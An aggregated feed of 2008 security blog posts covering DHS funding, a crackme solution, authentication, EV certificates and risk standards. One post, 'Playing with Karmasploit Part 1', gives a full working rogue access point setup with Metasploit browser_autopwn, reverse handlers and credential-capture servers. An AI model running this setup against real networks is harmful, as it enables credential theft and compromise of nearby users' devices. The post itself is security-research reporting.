Friday, August 15, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Friday News and Notes [Digital Bond]

Posted: 15 Aug 2008 06:59 AM CDT

  • The Department of Homeland Security announced the recipients of $11.7M in research contracts for cybersecurity. This is the funding source for Digital Bond’s Quickdraw project.
  • The NERC CIP products and services market offerings continue to expand. The latest is a NERC CIP Training course by Industry Compliance Institute. Caveat emptor we have no experience with this vendor or course. A one-page web-site?, but then again a fancy website doesn’t always equal quality offerings.
  • SEL also has a three day Cybersecurity for Electric Utilities course.
  • While CC-Link is an international control system protocol, it is driven by Mitsubishi and the Japanese markets. Initial versions of the protocol specifications are in Japanese. The latest protocol specification, CC-Link IE, is now available in English. We will have a SCADApedia page up shortly.

SecuraBit Episode 8 [SecuraBit]

Posted: 15 Aug 2008 06:01 AM CDT

On this Episode of SecuraBit Jason Mueller Chris Gerling Anthony Gartner Back from three week hiatus. Defcon and BlackHat Defcon Parties: Core Impact Party party Cisco Party Isight Party I-hacked Party StillSecure Freakshow Party ChicagoCon: Boot Camps: Oct 27 - 31 Conference: Oct 31 - Nov 1: Defcon Badges Ran out of Badges on first day: TV-B-Gone built into the badges: Servo hacks the badges - Podcasters Meetup - [...]


This posting includes an audio/video/photo media file: Download Now

F-Secure Khallenge Level 1 [ISIS Blogs]

Posted: 15 Aug 2008 12:18 AM CDT

Thanks to Aleksey and Phn1x for dealing with my constant stream of questions while reversing this. You’d think it was the first time I opened a debugger!

The level 1 challenge was a binary that asked for input and, if your input was correct, printed out an e-mail address you could use to get the level 2 binary. The Khallenge is a contest of speed, so the first person to get to and beat level 3 wins. Unfortunately, I solved level 1 after the contest ended and the level 2 and 3 binaries aren’t online yet, so no prizes and no info on those.

The first thing I did was open the binary is a disassembler and try to get a general feel for it. This would help me develop an attack strategy. In IDA, you can easily identify that your input is being XOR’d almost a dozen times and with a global variable somewhere. It quickly overwhelmed me, so I took out a pen and paper and started writing things down. I also had lots of problems identifying exact addresses and byte offsets in IDA (I haven’t used it much before), so I switched to Immunity Debugger at this point.

The first set of instructions your input needs to pass through are at addresses
69001081 to 6900108F, and it turns out they are a compiler-optimized strlen function. Pseudocode for these addresses looks like this:

if(strlen(input) != 4)     fail(); else     ...

compiler-optimized strlen

The XORs start immediately after this check. After staring at it for a while, you will figure out that your input is being used as a key to decrypt a global variable located at 0×690030D0. This global variable becomes the answer e-mail. I wrote out the encrypted e-mail in a column and mapped the XOR’d input bytes to it. Here is that table (encompasses addresses 69001095 to 690010F6):

e-mail @ 0x690030D4		input @ 69003100 e-mail[0]: 0x07		XOR	input[0] e-mail[1]: 0x2E		XOR	input[1] e-mail[2]: 0x35		XOR	input[2] e-mail[3]: 0x29		XOR	input[3] e-mail[4]: 0x70		XOR	input[0] e-mail[5]: 0x20		XOR	input[1] e-mail[6]: 0x76		XOR	input[2] e-mail[7]: 0x68		XOR	input[3]

obfuscated XORs

After all the XOR’s, the application starts to check the final values of 4 select bytes in the e-mail buffer.

e-mail[4]: 0x70		XOR	input[0] == 0x32 e-mail[1]: 0x2E		XOR	input[1] == 0x61 e-mail[6]: 0x76		XOR	input[2] == 0x30 e-mail[3]: 0x29		XOR	input[3] == 0x79

The compares that give it away

If you do the XOR in reverse, you can find out the input they are looking for:

0x70	XOR	0x32 = input[0] = 0x42 = B 0x2E	XOR	0x61 = input[1] = 0x4F = O 0x76	XOR	0x30 = input[2] = 0x46 = F 0x29	XOR	0x79 = input[3] = 0x50 = P

Run the executable, put BOFP into the prompt, all the XORs happen, all the checks pass, and the e-mail buffer decrypts to “Easy2o08.” Done!

the completed khallenge

Thanks again Aleksey and Phn1x!

This is a normal upgrade for me… []

Posted: 14 Aug 2008 11:51 PM CDT

Wow…getting our LANsight Security Management Appliances upgraded has been less than easy.  Luckily El Sidekick considered this a normal upgrade for him. I can always count on him to find the good in most anything.  We did manage to get them upgraded to the 5.1 code tonight (just finished at 11:30 tonight) by stepping up to a code level between what we were running and the latest version.  The first opinion of the new interface is that it is a definate improvement.  The dashboard has more/better detail as to what has actually been going on the environment.  One thing I would like to see, which I don’t think the previous versions had either, is the hostname displayed on the dashboard somewhere.  Having two sites with two different management appliances, sometimes it can get confusing when looking at both of them at the same time.

In other news…Alan is back!  Sounds like he’s been through quite the ordeal.  Sit down and have a cyber-beer.  You deserve it!

Up is down, right is left, dogs and cats living together…Chinese hackers on holiday [The Dark Visitor]

Posted: 14 Aug 2008 08:10 PM CDT

Yeah, the posts have been coming slow lately but some of you may have heard about a little event going on in China called the Olympics. Chinese hackers watching sporting events, worried about foreign hackers attacking them…my world is completely upside down.

The boys and girls from, the largest Chinese hacker training site, take over 20 of their “employees” out to enjoy the games. Plus, they love them some Mr. Yao Ming:

More pictures of their adventure here if you are interested…but pretty much the same as these.


Bye-Bye Passwords - Maybe? []

Posted: 14 Aug 2008 05:47 PM CDT

I came across an interesting New York Times story by Randall Stross over the weekend that discusses how we should be replacing passwords with information cards and how so-called single sign-on (SSO) services (e.g., OpenID and I’m sure any commercial product SSO efforts as well) just don’t add the security we need. Here are the relevant snippets from the article:”The solution urged by the experts is to abandon passwords - and to move to a fundamentally different model, one in which humans play little or no part in logging on. Instead, machines have a cryptographically encoded conversation to establish both parties’ authenticity, using digital keys that we, as users, have no need to see. In short, we need a log-on system that relies on cryptography, not mnemonics. As users, we would replace passwords with so-called information cards, icons on our screen that we select with a click to log on to a Web site. The click starts a handshake between machines that relies on hard-to-crack cryptographic code.”

“We won’t make much progress on information cards in the near future, however, because of wasted energy and attention devoted to a large distraction, the OpenID initiative. OpenID promotes “Single Sign-On”: with it, logging on to one OpenID Web site with one password will grant entrance during that session to all Web sites that accept OpenID credentials. OpenID offers, at best, a little convenience, and ignores the security vulnerability inherent in the process of typing a password into someone else’s Web site.”

Strangely enough, Microsoft seems to be involved in this new information card technology. It sounds a lot like Microsoft’s well-known CardSpace technology. As a matter of fact, Microsoft is part of a new Information Card Foundation (ICF) along with other heavyweights such as Equifax, Google, Novell, Oracle and PayPal. But then Microsoft is also a supporter of OpenID. How ironic…

The only issue I see with the way these information cards are them being desktop icons that you click to login as described in the New York Times story. When I’m logging into Windows at the beginning of the day, what do I do then? I won’t have access to these information card icons yet. Passwords anyone? Plus this doesn’t alleviate the problem of computers being infected with malware. If I can click it, a Trojan or virus can too. I agree with all the points about OpenID and other SSO efforts… but they’re such so darn convenient! There are a lot of questions that need to be addressed here and I’m sure we’ll all be learning a lot more about this technology as it evolves.

What do you think about this new authentication technology? Does your organization have plans to replace passwords with information cards? Here’s a link to the New York Times article.

Transparency []

Posted: 14 Aug 2008 05:40 PM CDT

There’s been a bit of debate on the blogs recently over the role of analysts, and how they pay their bills. It started with the Hoff, and Alan Shimel followed up (no link right now due to Alan’s blog issues). I know Chris wasn’t calling me out on this one (because he told me), but I do recognize I put a lot of content out there that people trust to help make decisions, and it’s only fair they know of any potential conflicts of interest I might have.

I’m not going to get into a big debate over the role of analysts in the IT industry. I think the good ones offer tremendous value, but I’m clearly biased. Where I’m not biased is in my positions. No matter who pays the bills, I recognize that most of my value in the security world is my objectivity. Everything I write is for the end user, even if a piece is sponsored by vendor or written internally for an investor. As soon as I forget that, my career is over.

It’s one thing for me to claim that, and another for you to believe it. I don’t assume you’ll take me at my word, and that’s why I throw everything out here on the blog and leave it for public comment. If you think I’m biased, call me on it. I don’t think I’ve ever deleted a a comment, other than spam and personal insults. Insulting argument is okay, but I decline to host pointless insults — there are lots of other places for that, and this is *my* (our) soapbox — you can set up your own website or find another board if you just want to flame online; there’s no shortage of venues. We also encourage vendors to comment, as long as they identify themselves clearly if it’s on something related to their offerings.

It’s also only fair you know who pays my bills, and my policies on papers and webcasts. Right now about 85% of our income is from vendors, with the remaining 15% split between investment clients, end users, and media companies (magazines/conferences). We’re expensive for consultants, and don’t typically engage in long-term projects, which cuts out a lot of paid end user business, although we do a ton of (short) free calls, emails, and meetings when I’m traveling.

As for papers and webcasts, the rules are we (Adrian and myself) will work with a vendor on a topic, but they have no input on the content. To make this work we give them detailed outlines of what they can expect before we write it, and all contracts are written so that if they don’t like the content, we go our separate ways and we won’t charge them. In all cases we (Securosis) own the content and only license it to the vendors for (usually) a year. And yes, I’ve walked away from deals, although we haven’t had one fall apart after the draft was written, since we prefer to work out any conflicts before we start. Also, all the content appears first on the blog for public input- this is the best way we can think of to be transparent.

So who pays the bills? I can’t talk about our strategy clients, but we’ve done public work (papers/webcasts/speaking) with all of the following vendors (I’m assuming you don’t care about the media companies):

  • Core Security
  • Guardium
  • Imperva
  • Mozilla
  • Oracle
  • Powertech
  • RSA
  • Securno
  • Sentrigo
  • Symantec
  • Tizor
  • Vericept
  • Websense
  • Winmagic
  • Workshare

There aren’t any surprises here- I’ve announced all those papers, webcasts, and such here on the blog already, along with who the sponsor was. No, I can’t talk about all our clients, but if they aren’t on that list, they’ve never sponsored any content. Another thing we do to balance objectivity is work with competitors- we won’t engage in contracts that exclude us from working with competitors.

This was all already public, so I’m not giving away any big secrets. Also, don’t take this as a “look how great we are!” post; we’re doing this for transparency, not marketing. We’ve also worked with SANS, CMP Media, TechTarget, some large financials (doesn’t everyone?), and a few investment types. That doesn’t count the end users we don’t charge.

That’s it. If you think we’re biased, call us on it and we won’t delete the comment. Our goal is to be as open as possible so you know where the information you’re reading comes from. Do we push some technologies? Yep, because we think they can help. We’ve definitely turned away work for things we don’t believe in.


DAVIX 1.0.1 Officially Launched [iplosion security]

Posted: 14 Aug 2008 05:39 PM CDT

After months of building and testing, the long anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exiting moment for me and I am curious to see how the product is received by audience. So far the ISO image has been downloaded at least 600 times from our main distribution server. Downloads from the mirrors are not accounted.

Applied Security VisualizationAdditionally, Raffael Marty’s book Applied Security Visualization is now available in print. DAVIX was built with this particular book in mind. If you are looking for a methodology and not just a workable tool set, then the book is what you are looking for. The book covers all steps from the very basics to complete case studies and contains many hands-on examples. Therefore, the book together with DAVIX 1.0.1 is the perfect match for getting you started with security visualization. For a preview of the book’s content check out the rough cuts version.

All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage. I wish you happy visualizing!

Blog Moved! [Security Uncorked]

Posted: 14 Aug 2008 02:22 PM CDT

Blog Moved!

The SecurityUncorked blog has moved to a new hosting location. The domains and .net will still take you to the blog site, but please discontinue use of this link (

For now, this old location will remain active until all/most incoming links have been updated but please be sure to update your favorites or links to



First Amazon for Applied Security Visualization Book [Raffy - Security Data Visualization]

Posted: 14 Aug 2008 02:21 PM CDT

I just saw the first Amazon review for my book. I just don’t understand why the person only gave it four stars, instead of five ;) Just kidding. Thanks for the review! Keep them coming!

Playing with Karmasploit Part 1 [Carnal0wnage Blog]

Posted: 14 Aug 2008 01:53 PM CDT

HD Moore released some documentation to get karmasploit working with the framework.

First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch,(I used the 2nd patch), so apply that before you make/make install.

You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so got an updated version of aircrack, patched airbase-ng, and madwifi drivers and can inject packets? Let's continue.

Let's do our aireplay-ng test to see if things are working:

root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...

19:55:44 Injection is working!

19:55:46 Found 5 APs

19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'

19:55:52 0/30: 0%

19:55:52 00:14:06:11:42:A2 - channel: 4 - ''
19:55:58 0/30: 0%

19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80

19:56:03 5/30: 16%

19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'

19:56:09 0/30: 0%

19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%

Look's like we are good.

Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.

With all the config files set up its pretty easy to get things going.

root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...

airbase-ng creates an at0 tap so you have to configure it and set the mtu size (all this if from the karmasploit documentation)

root@WPAD:/home/cg/evil/msf3# ifconfig at0 up netmask

root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400

root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800

After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.

root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net

After that we run our karma.rc file within using msfconsole.

root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc

=[ msf v3.2-release

+ -- --=[ 304 exploits - 124 payloads

+ -- --=[ 18 encoders - 6 nops

=[ 79 aux

resource> load db_sqlite3

[*] Successfully loaded plugin: db_sqlite3

resource> db_create /root/karma.db

[*] The specified database already exists, connecting

[*] Successfully connected to the database

[*] File: /root/karma.db

resource> use auxiliary/server/browser_autopwn

resource> setg AUTOPWN_HOST


resource> setg AUTOPWN_PORT 55550


resource> setg AUTOPWN_URI /ads


resource> set LHOST


resource> set LPORT 45000

LPORT => 45000

resource> set SRVPORT 55550

SRVPORT => 55550

resource> set URIPATH /ads

URIPATH => /ads

resource> run

[*] Starting exploit modules on host

[*] Started reverse handler

[*] Using URL:

[*] Local IP:

[*] Server started.

[*] Started reverse handler

[*] Using URL:

[*] Local IP:

[*] Server started.

[*] Started reverse handler

[*] Using URL:

[*] Local IP:

[*] Server started.

[*] Started reverse handler

[*] Using URL:

[*] Local IP:

[*] Server started.

[*] Started reverse handler

[*] Using URL:
[*] Local IP:
[*] Server started.

[*] Started reverse handler

[*] Using URL:

[*] Local IP:

[*] Server started.

[*] Started reverse handler

[*] Using URL:

[*] Local IP:

[*] Server started.

[*] Started reverse handler

[*] Using URL:

[*] Local IP:

[*] Server started.

[*] Started reverse handler

[*] Using URL:

[*] Local IP:

[*] Server started.

[*] Started reverse handler

[*] Server started.

[*] Using URL:

[*] Local IP:

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/pop3

resource> set SRVPORT 110

SRVPORT => 110

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/pop3

resource> set SRVPORT 995

SRVPORT => 995

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/ftp

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/imap

resource> set SSL false

SSL => false

resource> set SRVPORT 143

SRVPORT => 143

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/imap

resource> set SSL true

SSL => true

resource> set SRVPORT 993

SRVPORT => 993

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/smtp

resource> set SSL false

SSL => false

resource> set SRVPORT 25


resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/smtp

resource> set SSL true

SSL => true

resource> set SRVPORT 465

SRVPORT => 465

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/fakedns

resource> unset TARGETHOST

Unsetting TARGETHOST...

resource> set SRVPORT 5353

SRVPORT => 5353

resource> run

[*] Auxiliary module running as background job

resource> use auxiliary/server/fakedns

resource> unset TARGETHOST

Unsetting TARGETHOST...

resource> set SRVPORT 53


resource> run

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 80


resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 8080

SRVPORT => 8080

resource> set SSL false

SSL => false

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 443

SRVPORT => 443

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

resource> use auxiliary/server/capture/http

resource> set SRVPORT 8443

SRVPORT => 8443

resource> set SSL true

SSL => true

resource> run

[*] Server started.

[*] Auxiliary module running as background job

msf auxiliary(http) >

Next post we'll see karmasploit in action.

Over 50% of client systems are EV aware [Tim Callan's SSL Blog]

Posted: 14 Aug 2008 12:48 PM CDT

We recently hit a very cool milestone, which is that over half the client systems in use today are capable of distinguishing between Extended Validation SSL Certificates and traditional certificates. In other words, the combined market share of IE7, IE8 (very small), Firefox 3, and Opera 9.5 adds up to in excess of 52% of browsers in use. What's especially cool about that is it's an increase of almost 3% in a single month, which is quite a growth trajectory.

People have been writing about this milestone, such as this blogger at DaniWeb. The blogger questions how well six or seven thousand online businesses compare to the millions of Web sites that are out there, and I think that's a question that deserves an answer.

It's important to distinguish between the mass of Web sites out there that are strictly publishing content from the considerably smaller subset that actually engage in some sort of online business. EV SSL today very much is focused on those sites where consumers are asked to share sensitive information with a business, something like an account login or a credit card number or personally identifiable information. These are the pieces of information that criminals want to steal, and these are the sites that phishing and malware and other attacks are directed after. A consumer doesn't need protection from phishing attacks when visiting your personal blog or Star Wars fan site or even your company's brochureware site. It's only where the actual commerce takes place.

Therefore, you shouldn't consider the full footprint of Web sites in the world but rather this subset that is conducting business. I don't know exactly how to measure that number, but I expect it's orders of magnitude smaller than the number of total Web sites out there.

Now, there's an implication in this posting that maybe in the long run sites without commerce taking place will still want an EV cert in order to demonstrate their genuine identity. I think that is a possibility down the road, but today we're really focused on those sites where there is information to protect.


Posted: 14 Aug 2008 12:29 PM CDT

Originally Posted: 13 Aug 2008 10:24 AM CDT  Reposted due to server issues.

So much traveling, so little blogging.  Sorry everyone.  I've gotta say first that I really enjoyed meeting readers and friends of the blog this past two weeks.

Today, allow me to update you on FAIR and the movement towards a formal, open standard.  There's a couple of cool things going on in our little risk-world.

First, The Open Group Security Forum continues to move towards a formal adoption of FAIR.


Our meeting in Chicago a few weeks ago was great, but also slightly disturbing for me. I got pronoun-confusion syndrome.   I'm used to using the "we" pronoun to refer to RMI, or Jack and myself as we vet the models.  So without even thinking I would said "we have been looking at how loss occurs, and may want to change the model some" and The Open Group Members freaked out (rightfully so).  Adrian Seccombe gently reminded me that the "we" was now the Security Forum, and that "we" didn't go changing things at will without vetting against each other.  Man I love this stuff.  I get to run our thoughts and ideas past some great folks now - you know, those smart people who tend to have really complex problems and are trying hard to solve them.

Formal Adoption:  Soon, Very Soon Now

Formal Adoption basically means we've made this document, everyone is close to saying that they generally like it, and once that finally happens then "bam", we're ready to move onward and upward with better things (see Cookbooks, below).  We've got a couple of changes to the current document that have been requested that aren't a big deal.  For example, one request is that we make some statement about general applicability of FAIR to risk domains outside of the IT realm.   But once additions like that and others are done, this long process should be complete.

New Document Moving Towards Public Release:

We've got a basic document that should be public in the next few weeks on "What Makes a Good Risk Assessment Methodology" - written by yours truly and Jack.  It's a very high-level document, and serves two purposes:

  • For novices it helps parse out what is important in any undertaking to understand corporate risk (the repeated discussions on the ISO 27001 mailing list make me think it would be a place ripe for such a document).
  • For those who "know" risk, it helps to re-establish some fundamental principles like the use of scales (ratio, please), the implications of dealing in probabilities, what attributes like consistency and defensibility mean, how "risk" should be reported to the business (something you know, meaningful) and so on.

When this doc is deemed ready for public consumption I'll be sure to post on this blog here.


One interesting thing that came up in the Chicago meeting was that ENISA (The European Network and Information Security Agency) developed a very nice document that reviewed something like 18 different risk assessment methodologies against their Criteria for Goodness.  FAIR was one of the ones they reviewed, and we (the royal "we" used there to include all us FAIR-Folk) did awfully well.  Things of interest:

  • They based their work on the current introduction paper which is not at all a step-by-step guide towards an organizational risk assessment (what ENISA really wanted) and we did pretty well.  Well enough that if we had developed a paper along the lines of NIST 800-30 or OCTAVE for the use of FAIR in a formal process, we could have done really, really well.  Like won-the-bake-off kind of well.
  • FAIR is actually not at all incongruous to many of the risk assessment methodologies offered, and in fact compliments many of them by letting those methodologies develop real, structured probabilities.  Think OCTAVE, where they basically say "math is (probabilities are) hard, so if you want to do them for reals, good luck!  But here's a nonsensical way to do things if you want to believe in magic-fairy risk".  FAIR fits right in there by stomping on the magic-fairy risk with the jack-boots of rationality.  FAIR similarly helps other risk standards that might lack structured probability development.

So The Open Group Security Forum decided that though we could create a new document and totally p0wn any future ENISA bake-off, there wasn't much demand for the development of that documentation by the membership  - a point which was made quite apparent at the beginning of the discussion when one large European company CISO asked "What's ENISA?"  Relevancy is everything, I suppose.

But that second item up there - the one about helping rather than competing with other "risk assessment methodologies" - really struck a chord.  So "we" (The Security Forum) are going to develop some "Cookbooks" that basically are high-level documents that say "If you want to use FAIR with (OCTAVE/COSO/CoBIT/Whatever) here's how it fits, makes it better, and improves your life.  I'm pretty excited about these, and our first document looks like it's going to be COSO integration.


Finally, many people have asked me "Why work with The Open Group?"  There are many reasons, to be sure, but I will give you one example.  Members of the Security Forum there are not only great at vetting the model and getting consensus on risk and risk factors - but they're quick to start applying.  So in Chicago, I thought I'd be talking about FAIR and the standard and fighting groupthink.  Nope.  Not at all.  In fact, the forum members spent more time suddenly discussing use of FAIR in a new Trust Model they're developing.  So all of the sudden, I'm part of a new and exciting project to develop a Trust Model - how cool is that?  While formal adoption of the Trust Model will be necessarily long and deliberate - the collaboration and development is happening much faster than I can keep up with.  But if you all will allow me, it will help me get my head around it all by blogging about it later this week.  So be prepared to read about me dealing in "Trust" a little bit.

I'm back! [StillSecure, After All These Years]

Posted: 14 Aug 2008 12:12 PM CDT

It has certainly been an interesting week.  If there is anything else you want to know about me that has not already been posted, please feel free to send me your questions.  As most of you know, on Sunday morning my blog was hijacked/hacked as well as my yahoo mail address and the domain for this blog.  A lot of my personal information from these sources were posted on a public message list, along with some particularly hateful, ignorant, anti-Semitic ranting.  This event while traumatic has also resulted in some positives.

First of all let me say that I cannot go into a lot of the details of how this took place, as I am working with the authorities in this matter.  Secondly, let me say that all of the information exposed was my own personal information.  StillSecure infrastructure was not pierced or exposed at all, though the StillSecure SAT team treated this as a major breach and pulled out all of the stops in investigating and protecting our corporate infrastructure.

All of the above notwithstanding, it was not easy. Of course part of me would like to just be in a room with some of the people  (and I use that term loosely) who committed this crime and take care of this, but that is probably not going to happen (one can hope though).  In some way I feel that in order to make steel, iron has to be put through the fire.  This event has resulted in steel being made. Where before I viewed security as a business that I was in, security from here on in will be a much more passionate endeavor for me.  In many ways this has made me truly a security person.  You will see a much deeper commitment by me in keeping the slime of the world from being successful.  I am going to do everything I can to making myself, my family and all of us more secure.  Security for me has gone from a business to a way of life.

I am also extremely humbled and grateful for all of the help that so many of you have rendered over this week. I never truly felt part of the security "community" until this week. Over the coming days I am going to talk about what you should do if this happens to you.  However, having friends and support in the industry is something that most of us just don't have.  The security community has reached out and picked me up by the bootstraps, performing incredible acts of kindness and generosity in recovering from this. I realize now that in my years in this industry I have made some great friendships. On top of this, the people I have made friends with are just incredible people! I will detail some of these acts and people in days and weeks to come.  For now though know that I will never forget and will do my best to be worthy of your kindness and help. I think some of the other security bloggers in the community are going to speak out on this as well. I will be interested in what they have to say.

In case any of you are wondering, I will not stop blogging and speaking out.  I would never let the likes of these people silence or intimidate me.  In truth the fact that they targeted me tells me that I must have struck a nerve or did some good work, that they would feel it necessary to attack me. In looking at the list of some of the names targeted along with me, I was  almost honored to be included in such a prestigious group. I recognize that my blog and StillSecure is pretty well known and I guess that this shows that I am a target.  For now my blog will remain sparse.  As I continue to build it back up, I want to make sure that everything that is going in is clean of any malicious code. 

Stay tuned for more to come and thanks for sticking with me!

Upping the stakes for insane spam titles.... [ - A Revolution is the Solution]

Posted: 14 Aug 2008 11:56 AM CDT


Certifiably Silly [Emergent Chaos]

Posted: 14 Aug 2008 11:21 AM CDT

Over at "The Security Practice," Michael Barrett writes about "Firefox 3.0 and self-signed certificates." Neither he or I are representing our respective employers.
...almost everyone who wants to communicate securely using a browser can afford an SSL certificate from CAs such as GoDaddy, Thawte, etc. The cost of single certificates from these sources can only be described as nominal.
There are all sorts of use cases where $29 is not chump change. For example, I own about 8 domains, that's $240 in "security taxes." People in the third world would like to communicate securely. But most importantly, the idea assumes that it's ok to have an infrastructure which is mostly unencrypted, and we may only trust encryption only after the certificate priests bless it. When I wrote about turning on "opportunistic encryption for PostFix," my goal was encrypting all email. There's no need for a CA. The threat model is passive adversaries, and there are lots of those.
My company is a major target of phishing, and as such we’ve spent quite a bit of time researching what anti-phishing approaches work We published a whitepaper on this topic (which can be found on the company blog at, which explains this in detail. However, a couple of relevant conclusions are that: 1) the vast majority of users simply want to be protected, 2) there’s no single “silver bullet”, and 3) that what we describe as “safer browsers” such as IE 7, and Firefox 3.0 are a significant part of the solution based on their improvements in user visible security indicators and secure-by-default behaviors.
You can't always get what you want. Really, most people have little understanding of the issues. I think this is in large part because we've been talking down to them, in some part because the issues are complex, and in some part because it's not important enough for them to want to become educated. It's especially not important enough in light of debates like this one. We should try (sometime) to give people what they need.

I think we'd agree that the vast majority of users want, need and deserve protection that's as simple and effective as we can make it. I don't think blocking self-signed certs is a large part of that goal.

I conflated two or three separate ideas in that last sentence, and I should explain them. The general logic is that most users should never be presented with a security dialog that gives them a choice – if they are, there’s typically at least a 50:50 chance that the wrong decision will be made. Instead, the browser should make the decision for them. However, in the case of self-signed certificates it’s almost impossible to see how any technology can disambiguate between legitimate uses and criminal ones.

When viewed through this lens, the changes to the Firefox user experience for self-signed certificates makes perfect sense.

Even viewed through the lens presented, the self-signed experience doesn't make perfect sense, unless you start with the assumption that a $29 SSL cert has some useful security value. I don't believe it does. What it does is get rid of the 'self-signed' warnings. There are cheaper and easier ways to do that. Most of the certificates out there are signed by a company that the relying consumers have never heard of. There's just not that much verification that can be done for $29. Today, anyone who's broken into a company's mail server can buy a fake cert with a stolen credit card.

Now, Michael's employer is under massive attack. I am sympathetic to their desire to improve things, and I applaud a lot of things that they do. For example, their use of one time password tokens is great. I also think there's great value to pushing people to recent browsers.

At the same time, it's sensible for them to want to shift risk-part of me even welcomes the risks and attacks hitting the CAs. But I think that imposing yet another security tax, based on a static analysis of attackers, and some certificate authority pixie dust isn't going to help things for very long.

And given the very real costs and the very fuzzy benefits, I think that breaking self-signed certificates is the wrong approach. What's the right approach? I wrote "Preserving the Internet Channel Against Phishers" three years ago. I think that the advice isn't silly at all.

Which Iceberg's Bigger? [ImperViews]

Posted: 14 Aug 2008 11:20 AM CDT

bigger.pngWhen I was writing the tip of the iceberg post I was excited from the thought that the overall damage of the data loss problem is much higher then reported. According to the Wall Street Journal, The Federal Trade Commission estimates nearly $50 billion is lost annually as a result of identity theft and credit-card fraud, with part of it absorbed by banks. In other words, not only the numbers are probably much higher than reported and therefor estimated by the FDC, it also seems like the bigger data loss events are a direct result of one of the following causes:

  1. An application and / or database hack.
  2. Some sort of a separation of duties violation .
  3. All of the above.

SecureSphere covers all those use cases. In other words, the portion of the problem that can be addressed by SecureSphere is very big. Huge.

OPC UA Assessment Series: Part 1 [Digital Bond]

Posted: 14 Aug 2008 08:56 AM CDT

Digital Bond has just completed a security assessment report on the OPC Unified Architecture [UA] protocol, and we will be issuing a series of blog posts supported with SCADApedia content on the results.

The assessment included both a paper security review of the multi-part OPC UA specification and an application assessment of the OPC Foundation’s Software Development Kit [SDK]. The SDK consists of a communication stack that vendors can build OPC UA applications on top of as well as sample client and server applications. The OPC UA security controls are in the communication stack. You can think of this as an assessment of a library with the sample client and server exercising the library.

This is an ideal time to review OPC UA security. The specifications are complete enough to support a review, and the SDK that many vendors will use to develop OPC UA client and server applications is out in beta, and OPC UA is not yet used in production systems. So by identifying and correcting vulnerabilities now, we can prevent them from getting deployed and avoid the reluctance and difficulty in making changes in operational systems.

The tentative organization of this series is:

  • Part 1: Intro
  • Part 2: Positive Findings
  • Part 3: Specification Vulnerabilities
  • Part 4: SDK Vulnerabilities
  • Part 5: OPC UA Vendor Implementation Vulnerabilities
  • Part 6: Asset Owner Tip Sheet to Analyzing The Security of Competitive OPC UA Servers
  • Part 7: Specification and SDK Improvements

